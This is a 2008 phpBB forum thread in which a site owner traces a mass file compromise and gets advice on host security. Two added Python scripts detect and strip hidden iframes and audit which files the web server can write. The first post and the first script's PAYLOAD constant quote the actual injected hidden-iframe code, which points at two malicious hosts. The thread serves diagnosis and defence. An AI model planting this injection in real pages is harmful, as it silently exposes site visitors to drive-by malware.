
Found a trojan on my board

Posted: Thu Oct 02, 2008 5:41 pm
by Remon
Over the last couple of days, multiple visitors to my phpBB forum have been reporting to me that they get a strange request to install RealPlayer and open PDF files.

That sounded strange to me, because HTML posting is disabled.

At first I thought that the visitors' computers were infected with spyware, trojans and other crap. But I keep getting new reports, even from visitors with alternative browsers and Linux as the operating system.

So I decided to do some research, logged in to my host with an FTP client, and this is what I found:

Infected files, all changed on September 28, at exactly 4:34:00 AM:

/index.php
/admin/index.php
/cache/index.htm
/db/index.htm
/docs/CHANGELOG.html
/docs/codingstandards.htm
/docs/FAQ.html
/docs/INSTALL.html
/docs/README.html
/images/index.htm
/images/avatars/index.htm
/images/avatars/galery/index.htm
/includes/index.htm
/includes/page_header.php
/language/index.htm
/language/dutch/index.htm
/language/dutch/email/index.htm
/language/english/index.htm
/language/english/email/index.htm
/templates/index.htm
/templates/subSilver/index.htm
/templates/subSilver/admin/index.htm
/templates/subSilver/images/index.htm
/templates/subSilver/index.htm
/templates/subSilver_old/admin/index.htm
/templates/subSilver_old/images/index.htm

With the following code added on the last line:


<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
While I was trying to download one of these files, my virus scanner (McAfee) detected the trojan "JS/Tenia.d".

All files have CHMOD set to 644. Pretty safe, isn't it?

I have backups, so I can put everything back to normal, but I'm afraid that this can happen again. I've also contacted my hosting provider; maybe there's a trojan or worm on their servers.

This trojan was maybe written to infect phpBB boards, because there is one stranger among the infected files, page_header.php. That is typically a phpBB board file.

Other useful information:
Board is running phpBB 2.0.23
The address is http://www.radiohobby.nl, which is temporarily offline for the above reasons.

Re: Found a trojan on my board

Posted: Thu Oct 02, 2008 5:53 pm
by JimA
Well, when I see this it seems to me that you've been hacked. :(
Try posting a report in the Incident tracker, give all the information you think can help, and see what happens and what they say.

Re: Found a trojan on my board

Posted: Thu Oct 02, 2008 7:01 pm
by Remon
I've found out that .htm/.html/.php files in non-public folders on the server are also infected.

I have to wait now until the hoster replies to me...

Re: Found a trojan on my board

Posted: Fri Oct 03, 2008 6:07 pm
by dkinzer
Remon wrote: I've found out that .htm/.html/.php files in non-public folders on the server are also infected.
It is quite likely that you have a keylogger trojan or some other type of malware on the PC that you use to upload files to your host. By this means, the hackers can get your account's username/password and then modify files at will.

The first step is to change your account's master password and the password on all FTP logins that have the capability to modify files in the directories where you've found evidence. However, you must do this on a system that is known to be virus/trojan-free or it will be to no avail.

You should also review the state of your PC's security software. If it is outdated or if you are missing some key elements, you should take immediate steps to rectify that.

Re: Found a trojan on my board

Posted: Fri Oct 03, 2008 11:25 pm
by Remon
Everything is secured to the maximum on my PCs.

Today I phoned the hosting company; they told me that this issue is known, that over 50,000 pages are infected and that 750 customers have the same problems as me...

They can't find the process that causes this, so they are still searching. The CEO even came back early from his holiday...

In the meantime they are also running a script that cuts the iframe out of all the pages, but that's a temporary solution because the process can change the files again at any moment.
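The two pieces of the story so far are an indicator (the zero-size iframe appended as the last line of every .php/.htm/.html file, all with the same mtime, from the first post) and a stop-gap (the host's script that cuts the iframe back out). The script below is an added example, not code from the thread, from phpBB or from the host: it walks a tree, reports every file containing a hidden iframe together with its mtime and the hosts the iframe points at, and can strip the tag out again byte-for-byte. The sample tree it builds is constructed for the demo; the payload bytes are the ones quoted in the first post, `example.invalid` is a placeholder for a legitimate visible iframe, and the stand-in page_header.php is not phpBB's real file.

```python
import os
import re
import tempfile
from datetime import datetime

# A zero-size <iframe> (width=0 and height=0, either order): the shape of the tag
# appended to every infected file in this thread. Bytes regex so files are rewritten
# byte-for-byte and nothing gets re-encoded.
HIDDEN_IFRAME = re.compile(
    rb'<iframe\b(?=[^>]*\bwidth=["\']?0\b)(?=[^>]*\bheight=["\']?0\b)[^>]*>.*?</iframe>',
    re.IGNORECASE | re.DOTALL,
)
SRC_HOST = re.compile(rb'src=["\']?https?://([^/"\'\s>]+)', re.IGNORECASE)
SCAN_SUFFIXES = (".php", ".htm", ".html")


def find_injected(root):
    """Sorted (path, mtime ISO string, [iframe hosts]) for every .php/.htm/.html file
    under root that contains a hidden iframe. The mtime column is what lets you spot
    a single-timestamp mass edit like the 4:34:00 AM one in the thread."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            tags = HIDDEN_IFRAME.findall(data)
            if not tags:
                continue
            hosts = sorted({h.decode("ascii", "replace") for t in tags for h in SRC_HOST.findall(t)})
            mtime = datetime.fromtimestamp(os.path.getmtime(path)).isoformat(timespec="seconds")
            hits.append((path, mtime, hosts))
    return sorted(hits)


def strip_injected(path):
    """Remove every hidden iframe from one file. Returns True if the file changed."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, count = HIDDEN_IFRAME.subn(b"", data)
    if count == 0:
        return False
    # The payload was appended as a trailing line; normalise the tail to one newline.
    cleaned = cleaned.rstrip() + b"\n"
    with open(path, "wb") as fh:
        fh.write(cleaned)
    return True


# The exact tag pair quoted in the first post.
PAYLOAD = (
    b'<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" '
    b'frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
    b'<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" '
    b'frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
)
# Constructed stand-in for includes/page_header.php; not phpBB's real file.
ORIGINAL_HEADER = b"<?php\n// constructed stand-in for page_header.php\necho 'header';\n?>\n"


def build_sample_site(root):
    """Constructed tree: a clean file, a file with PAYLOAD appended on its last line
    (as in the thread), and a legitimate visible iframe that must not be flagged."""
    os.makedirs(os.path.join(root, "includes"))
    os.makedirs(os.path.join(root, "docs"))
    paths = {
        "clean": os.path.join(root, "index.php"),
        "infected": os.path.join(root, "includes", "page_header.php"),
        "visible": os.path.join(root, "docs", "FAQ.html"),
    }
    with open(paths["clean"], "wb") as fh:
        fh.write(b"<?php\necho 'ok';\n?>\n")
    with open(paths["infected"], "wb") as fh:
        fh.write(ORIGINAL_HEADER + PAYLOAD + b"\n")
    with open(paths["visible"], "wb") as fh:
        # example.invalid is a placeholder host, not a real site
        fh.write(b'<html><iframe src="http://example.invalid/help" width=400 height=300></iframe></html>\n')
    return paths


def run_demo():
    """Scan, clean, rescan a temporary tree; returns what each step produced."""
    root = tempfile.mkdtemp()
    paths = build_sample_site(root)
    before = find_injected(root)
    changed = [p for p in paths.values() if strip_injected(p)]
    with open(paths["infected"], "rb") as fh:
        restored = fh.read() == ORIGINAL_HEADER
    return {
        "flagged": [h[0] for h in before],
        "hosts": before[0][2] if before else [],
        "changed": changed,
        "after": find_injected(root),
        "restored": restored,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run it against a copy of the site, not the live tree: the report with mtimes is the evidence you want to keep, and stripping only removes the symptom, which is why the host's own version of this was rightly called a temporary solution.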

Re: Found a trojan on my board

Posted: Sat Oct 04, 2008 2:12 am
by espicom
Classic sign of a compromised file manager on the server. The host didn't keep up with security updates, and someone managed to gain access to all files because of it. Older versions of cPanel have had this problem, and other file managers, too.

You're going to have to wait on the host, because anything you do is going to be overwritten by the next attack. The host has to secure the file manager and clean all the trojan horse programs out. I hope you have a recent, pre-attack backup of all your files and data, or that they do!

Re: Found a trojan on my board

Posted: Sat Oct 04, 2008 2:49 am
by Remon
Thanks for your kind reply!

I have a backup of the files on the host, but is there any chance that the database is infected? The last SQL backup I made is dated the 22nd of September. On 2 October I disabled my board, which means 10 days lost... :(

Re: Found a trojan on my board

Posted: Sat Oct 04, 2008 4:13 am
by espicom
There is always a possibility, but the particular type of attack made (replacing index.* with infecting code) usually does not go after databases. It's a wild-card replacement of code, rather than specific programs to attack particular applications. Do a backup immediately, either way, because you can always clean out any infected messages or re-work any changed settings.

Re: Found a trojan on my board

Posted: Thu Oct 09, 2008 9:22 pm
by Remon
My host cleaned up all the files and they found a solution so that this issue cannot happen again.

Re: Found a trojan on my board

Posted: Thu Oct 09, 2008 9:44 pm
by ric323
Remon wrote: My host cleaned up all the files and they found a solution so that this issue cannot happen again.
That means that they finally updated their old copy of the CPANEL application.
(CPANEL fixed it over two years ago...)

Re: Found a trojan on my board

Posted: Fri Oct 10, 2008 2:51 pm
by Remon
I'm not sure about that.

They disabled allow_url_include in php.ini, because PHP scripts can't open external links/images anymore... The update checker in the ACP didn't work with that, and my (upgraded to 3.0.2) board cannot get image information from external pictures to set the width and height...

Another ticket has been made for customer support...

Re: Found a trojan on my board

Posted: Mon Oct 13, 2008 12:06 am
by espicom
You are right to be suspicious if they think disabling URL includes "fixes" the problem. Properly configured, even if PHP can include a URL outside the local machine, the web server should not be running at a privilege level that would allow it to overwrite any files that are not specifically set aside as "writable", nor would it be able to create any files outside of directories specifically set to allow that (i.e., the avatar upload directory, if you've enabled that feature).

And yet, someone was able to overwrite index.php... which means whatever method allowed access, it was running NOT as the same user as the web server SHOULD be running (a non-privileged user).

Keep your backups VERY current. And shop for a host that knows how to deal with security.
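The check espicom is describing, and the reason the "CHMOD 644" from the first post did not help, can be made concrete. The script below is an added example (not from the thread, phpBB or any host's tooling): given a document root and the uid/gid the web server runs as, it lists every file and directory that identity could modify, skipping an allowlist of directories that are meant to be writable such as an avatar upload directory. The sample tree, its modes, and the web server identity it assumes (a uid different from ours, sharing our primary group) are constructed for the demo. Note what the check cannot see: a process running as the account owner, or as root, writes a 644 file regardless of mode bits, which is exactly the compromised-file-manager case espicom suspects.

```python
import os
import stat
import tempfile


def writable_by(st, uid, gid):
    """True if a process running as uid/gid could write this object according to its
    mode bits. Root is deliberately not special-cased: a file manager running as root
    (or as the account owner itself) is the case mode 644 cannot stop."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_docroot(docroot, web_uid, web_gid, allowed_writable=()):
    """Relative paths under docroot (files and directories) that the web server identity
    could modify and that are not inside an allowlisted upload directory. A writable
    directory counts because new files (or a replaced index.php) can be dropped into it."""
    allowed = tuple(os.path.normpath(a) for a in allowed_writable)
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot)
            if any(rel == a or rel.startswith(a + os.sep) for a in allowed):
                continue
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # the link target is judged on its own visit
            if writable_by(st, web_uid, web_gid):
                findings.append(rel)
    return sorted(findings)


def build_sample_tree(root):
    """Constructed layout echoing the thread's paths, with deliberately mixed modes.
    Directories come first so every mode is set explicitly, whatever the umask."""
    layout = [
        ("includes", 0o755), ("docs", 0o755), ("images", 0o755), ("images/avatars", 0o755),
        ("cache", 0o775),                  # group-writable directory
        ("images/avatars/upload", 0o777),  # intended upload dir, allowlisted below
        ("index.php", 0o644),              # the 'pretty safe' mode from the first post
        ("includes/page_header.php", 0o666),  # world-writable: anyone can inject
        ("docs/FAQ.html", 0o664),          # group-writable
    ]
    for rel, mode in layout:
        path = os.path.join(root, rel)
        if "." in os.path.basename(rel):
            with open(path, "wb") as fh:
                fh.write(b"<?php /* constructed */ ?>\n")
        else:
            os.makedirs(path, exist_ok=True)
        os.chmod(path, mode)


def run_demo():
    """Audit a temporary tree as if the web server were another user in our group."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    web_uid, web_gid = os.getuid() + 1, os.getgid()  # constructed identity
    return audit_docroot(root, web_uid, web_gid, allowed_writable=("images/avatars/upload",))


if __name__ == "__main__":
    for rel in run_demo():
        print("writable by web server:", rel)
```

On a real host you would pass the uid/gid from `ps` or `getent passwd www-data` and the upload directories phpBB is configured to write; index.php and page_header.php should never appear in the output.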

Re: Found a trojan on my board

Posted: Mon Oct 13, 2008 2:13 am
by Remon
It's going from bad to worse; the host is blocking everything with a firewall. phpBB cannot read picture sizes and returns an error to the members...

And I just paid like 200 euros for October 2008 to October 2009... :cry: